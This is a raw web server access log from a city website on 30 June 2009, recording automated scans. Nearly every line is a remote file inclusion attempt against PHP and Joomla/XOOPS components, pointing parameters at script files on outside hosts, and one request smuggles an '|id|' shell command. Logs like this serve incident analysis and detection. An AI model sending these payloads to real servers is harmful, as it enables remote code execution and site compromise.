60.50.2.44 - - [30/Jun/2009:19:40:16 -0700] "GET /logs/access_080531.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.2.44 - - [30/Jun/2009:19:40:16 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:40:24 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:40:46 -0700] "GET /logs/access_080601.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.214.60.181 - - [30/Jun/2009:19:41:24 -0700] "GET /logs/access_080531.log/aaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:43:22 -0700] "GET /logs/access_081001.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:35 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:35 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:35 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:37 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:37 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:43:37 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:43:48 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:45:08 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:45:12 -0700] "GET /?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:45:12 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:45:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:46:04 -0700] "GET /logs/access_080531.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:46:58 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
92.51.157.168 - - [30/Jun/2009:19:47:45 -0700] "GET / HTTP/1.1" 200 917 "http://smart.apnoti.com" "smart.apnoti.com Robot/v1.34 (http://smart.apnoti.com/index/aboutApnotiWebCrawler)" "cityofarkadelphia.com"
92.51.157.168 - - [30/Jun/2009:19:47:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://smart.apnoti.com" "smart.apnoti.com Robot/v1.34 (http://smart.apnoti.com/index/aboutApnotiWebCrawler)" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:06 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:06 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:48:06 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:06 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:56 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:57 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:57 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:48:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:03 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:03 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:04 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:04 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:17 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:19 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:31 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:31 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:52 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:52 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:49:53 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:50:22 -0700] "GET /logs/access_080330.log%20//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:50:45 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:50:45 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:50:45 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:28 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:33 -0700] "GET /logs/access_080330.log/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:19:51:34 -0700] "GET /logs/access_080330.log/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:19:51:49 -0700] "GET /?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:19:52:03 -0700] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:19:52:03 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:19:52:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:19:52:22 -0700] "GET /?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:19:52:22 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:54:29 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:55:10 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:55:11 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:55:50 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:56:10 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:56:12 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:56:27 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:56:29 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:19:56:44 -0700] "GET /logs/access_080531.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:57:26 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:57:40 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:46 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:46 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:46 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:48 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:48 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:48 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:49 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:49 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:19:57:49 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:19:57:56 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.newtech-bg.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:19:58:47 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:01:27 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:01:39 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:20:04:23 -0700] "GET /logs/access_080531.log//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:20:04:23 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:20:07:01 -0700] "GET /logs/access_080330.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:20:07:15 -0700] "GET /logs/access.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:20:10:19 -0700] "GET /logs/access_080531.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:20:10:51 -0700] "GET /logs/access_080330.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:20:12:19 -0700] "GET /logs/access_080330.log//class/class.dashboard_cms.php?where_framework=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:12:24 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:12:24 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:12:25 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:20:12:36 -0700] "GET /logs/access_080330.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.203.180.144 - - [30/Jun/2009:20:12:43 -0700] "GET /logs/access.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:12:43 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:15:24 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:15:24 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:15:24 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:39 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:39 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:39 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:48 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:48 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:48 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:49 -0700] "GET /logs/access_081001.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:16:58 -0700] "GET /logs/access_081001.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
